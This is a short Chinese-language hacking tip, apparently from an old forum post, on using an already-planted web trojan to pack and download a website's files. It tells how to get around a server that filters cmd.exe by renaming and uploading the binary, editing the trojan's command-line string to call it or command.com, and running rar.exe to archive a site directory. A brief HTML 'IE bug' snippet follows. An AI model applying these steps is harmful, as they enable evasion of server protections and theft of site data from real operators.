例如RAR打包下载网站
有很多情况是服务器滤掉了cmd.exe
我们可以改名cmd.exe重新上传到一个可执行目录 {如果服务器上没RAR.EXE也可一起上传}
然后修改木马里的DOS命令行:hz="CMD.EXE /c "&hz&""为hz="你改名的cmd.exe /c "&hz&""呵呵
也可以这样:hz="command.com /c "&hz&""你看
执行 command.com /c c:\Program Files\winrar\rar.exe a E:\2002612\smallhome.51.net\lcx\clp.rar E:\2002612\smallhome.51.net\lcx 完成!
IE的小bug,6.0都有
<script>
self.window();
</script>
保存成*.htm
|